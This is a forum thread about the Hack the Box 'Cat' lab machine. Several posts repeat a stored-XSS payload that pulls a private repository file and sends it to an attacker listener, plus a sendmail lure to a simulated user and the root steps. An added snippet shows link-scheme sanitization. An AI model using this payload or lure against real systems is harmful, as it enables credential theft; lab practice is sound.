Cat Hack the Box Season 7 (Linux medium)
by RedBlock - Saturday February 1, 2025 at 02:47 PM
#51
(Feb 02, 2025, 02:23 AM)maggi Wrote:
(Feb 02, 2025, 02:16 AM)Mayilvaganam Wrote:
(Feb 02, 2025, 01:55 AM)maggi Wrote:
(Feb 02, 2025, 01:49 AM)anon493483 Wrote:
(Feb 02, 2025, 01:07 AM)maggi Wrote: people be posting user+root passwd but if you want to know....

start python server port 80 on kalibox

create repo maggi
create blank file in repo called...."maggi"

put this payload in description

<a href="javascript:fetch('http://localhost:3000/administrator/Employee-management/raw/branch/main/index.php').then(response => response.text()).then(data => fetch('http://10.10.xx.xx/?response=' + encodeURIComponent(data))).catch(error => console.error('Error:', error));">maggi</a>


Then send an email as axel to jobert......click the new "maggi" in the repo and be patient and wait for something on python server like:
[01/Feb/2025 19:42:30] "GET /?response=%3C%3Fphp%0A%24valid_username.........

axel@cat:/var/mail$ echo -e "Subject: test \n\nHello check my repo http://localhost:3000/axel/maggi" | sendmail jobert@LocalHost
axel@cat:/var/mail$ su root
Password:
root@cat:/var/mail# cd /root
root@cat:~# cat root.txt
25880005d****************
root@cat:~#

Where did you find info about the Employee-management repo?

Check Axel's mail

We are currently developing an employee management system. Each sector administrator will be assigned a specific role, while each employee will be able to consult their assigned tasks. The project is still under development and is hosted in our private Gitea. You can visit the repository at: http://localhost:3000/administrator/Empl...anagement/. In addition, you can consult the README file, highlighting updates and other important details, at: http://localhost:3000/administrator/Empl.../README.md.



Jobert is not clicking my link, what to do? Not getting any response after sending mail

you need to click the link "maggi" under maggi in axel's repo and send off that mail.....or other way around

it doesn't work
`[01/Feb/2025 21:44:34] "GET /?response=Not%20found.%0A HTTP/1.1" 200 -`
#52
How did you guys find creds for Gitea?
#53
(Feb 02, 2025, 02:49 AM)4yhg5y72jffg820j3f Wrote: How did you guys find creds for Gitea?

Use the same credentials, as you used for axel
#54
(Feb 02, 2025, 02:46 AM)samuelballsiu1 Wrote:
(Feb 02, 2025, 02:23 AM)maggi Wrote:
(Feb 02, 2025, 02:16 AM)Mayilvaganam Wrote:
(Feb 02, 2025, 01:55 AM)maggi Wrote:
(Feb 02, 2025, 01:49 AM)anon493483 Wrote: Where did you find info about the Employee-management repo?

Check Axel's mail

We are currently developing an employee management system. Each sector administrator will be assigned a specific role, while each employee will be able to consult their assigned tasks. The project is still under development and is hosted in our private Gitea. You can visit the repository at: http://localhost:3000/administrator/Empl...anagement/. In addition, you can consult the README file, highlighting updates and other important details, at: http://localhost:3000/administrator/Empl.../README.md.



Jobert is not clicking my link, what to do? Not getting any response after sending mail

you need to click the link "maggi" under maggi in axel's repo and send off that mail.....or other way around

it doesn't work
`[01/Feb/2025 21:44:34] "GET /?response=Not%20found.%0A HTTP/1.1" 200 -`

be quick about it there is a cleanup script
#55
(Feb 02, 2025, 01:55 AM)maggi Wrote:
(Feb 02, 2025, 01:49 AM)anon493483 Wrote:
(Feb 02, 2025, 01:07 AM)maggi Wrote: people be posting user+root passwd but if you want to know....

start python server port 80 on kalibox

create repo maggi
create blank file in repo called...."maggi"

put this payload in description

<a href="javascript:fetch('http://localhost:3000/administrator/Employee-management/raw/branch/main/index.php').then(response => response.text()).then(data => fetch('http://10.10.xx.xx/?response=' + encodeURIComponent(data))).catch(error => console.error('Error:', error));">maggi</a>


Then send an email as axel to jobert......click the new "maggi" in the repo and be patient and wait for something on python server like:
[01/Feb/2025 19:42:30] "GET /?response=%3C%3Fphp%0A%24valid_username.........

axel@cat:/var/mail$ echo -e "Subject: test \n\nHello check my repo http://localhost:3000/axel/maggi" | sendmail jobert@LocalHost
axel@cat:/var/mail$ su root
Password:
root@cat:/var/mail# cd /root
root@cat:~# cat root.txt
25880005d****************
root@cat:~#

Where did you find info about the Employee-management repo?

Check Axel's mail

We are currently developing an employee management system. Each sector administrator will be assigned a specific role, while each employee will be able to consult their assigned tasks. The project is still under development and is hosted in our private Gitea. You can visit the repository at: http://localhost:3000/administrator/Empl...anagement/. In addition, you can consult the README file, highlighting updates and other important details, at: http://localhost:3000/administrator/Empl.../README.md.

ack. totally glossed over that. thanks!
#56
(Feb 02, 2025, 02:57 AM)maggi Wrote:
(Feb 02, 2025, 02:46 AM)samuelballsiu1 Wrote:
(Feb 02, 2025, 02:23 AM)maggi Wrote:
(Feb 02, 2025, 02:16 AM)Mayilvaganam Wrote:
(Feb 02, 2025, 01:55 AM)maggi Wrote: Check Axel's mail

We are currently developing an employee management system. Each sector administrator will be assigned a specific role, while each employee will be able to consult their assigned tasks. The project is still under development and is hosted in our private Gitea. You can visit the repository at: http://localhost:3000/administrator/Empl...anagement/. In addition, you can consult the README file, highlighting updates and other important details, at: http://localhost:3000/administrator/Empl.../README.md.


Jobert is not clicking my link, what to do? Not getting any response after sending mail

you need to click the link "maggi" under maggi in axel's repo and send off that mail.....or other way around

it doesn't work
`[01/Feb/2025 21:44:34] "GET /?response=Not%20found.%0A HTTP/1.1" 200 -`

be quick about it there is a cleanup script

Man, the box should have been named cleaner, cause darn. Can't get anything done. Stuck on root as jobert is not clicking the link

#57
jobert finally clicked, you gotta spam him with emails, and make sure your repo has not been purged by the cleanup scripts
#58
(Feb 02, 2025, 03:47 AM)4yhg5y72jffg820j3f Wrote: jobert finally clicked, you gotta spam him with emails, and make sure your repo has not been purged by the cleanup scripts


Still can't understand, I did all that. Spammed him, clicked on the link and made sure it was still on the gitea but my repo was never clicked...

#59
(Feb 02, 2025, 04:14 AM)0xbeef Wrote:
(Feb 02, 2025, 03:47 AM)4yhg5y72jffg820j3f Wrote: jobert finally clicked, you gotta spam him with emails, and make sure your repo has not been purged by the cleanup scripts


Still can't understand, I did all that. Spammed him, clicked on the link and made sure it was still on the gitea but my repo was never clicked...
wouldn't send a mail....

you create the repo "maggi" with a payload in the description field

<a href="javascript:fetch('http://localhost:3000/administrator/Employee-management/raw/branch/main/index.php').then(response => response.text()).then(data => fetch('http://10.10.xx.xx/?response=' + encodeURIComponent(data))).catch(error => console.error('Error:', error));">test</a>

Then create a new file called test, leave it blank, nothing in description

now there should be a test under maggi in axel

Send the mail as axel
click test
wait....a good 10 seconds and encoded snippet with passwd comes back on 80

That worked for me hope it helps
Reply
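
The posts above rely on a repository description being rendered with a live `javascript:` link that runs in the session of whoever clicks it. As an added example (not written by any poster and not Gitea's own code), this is a scheme allowlist a renderer can apply to every link in user-supplied text; `safeHref`, `renderAnchor` and the allowed-scheme list are hypothetical, and the anchor is assumed to arrive from an HTML parser with entities already decoded.

```javascript
// Added example: allowlist link schemes before rendering user-supplied HTML.
const ALLOWED_SCHEMES = new Set(["http:", "https:", "mailto:"]);
const SITE_BASE = "http://localhost:3000/"; // origin quoted in the thread

const HTML_ESCAPES = { "&": "&amp;", "<": "&lt;", ">": "&gt;", '"': "&quot;", "'": "&#39;" };
const escapeHtml = (s) => String(s).replace(/[&<>"']/g, (c) => HTML_ESCAPES[c]);

// Returns the normalized absolute URL when its scheme is allowed, else null.
// The WHATWG URL parser applies the same normalization a browser does
// (case folding, stripping leading control characters and embedded tabs or
// newlines), so obfuscated spellings of a scheme resolve to the same protocol.
function safeHref(href, base = SITE_BASE) {
  if (typeof href !== "string") return null;
  try {
    const url = new URL(href, base);
    return ALLOWED_SCHEMES.has(url.protocol) ? url.href : null;
  } catch {
    return null; // unparsable values are treated as unsafe
  }
}

// anchor = { href, text } as produced by an HTML parser (hypothetical shape).
// Unsafe links are kept as inert text instead of being dropped silently.
function renderAnchor(anchor) {
  const href = safeHref(anchor.href);
  const text = escapeHtml(anchor.text);
  if (href === null) return `<span>${text}</span>`;
  return `<a href="${escapeHtml(href)}" rel="nofollow noopener noreferrer">${text}</a>`;
}

// Constructed sample inputs, not taken from the thread.
const SAMPLES = [
  { href: "javascript:void(0)", text: "plain" },
  { href: "  JaVaScRiPt:void(0)", text: "mixed case, leading spaces" },
  { href: "java\tscript:void(0)", text: "embedded tab" },
  { href: "data:text/html,hi", text: "data URL" },
  { href: "/axel/maggi", text: "relative link" },
];

for (const sample of SAMPLES) {
  console.log(renderAnchor(sample));
}
```

A Content-Security-Policy without `'unsafe-inline'` also stops `javascript:` URLs from executing and is worth having as a second layer behind the allowlist.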
#60
I have added user and root ssh pass on the first page.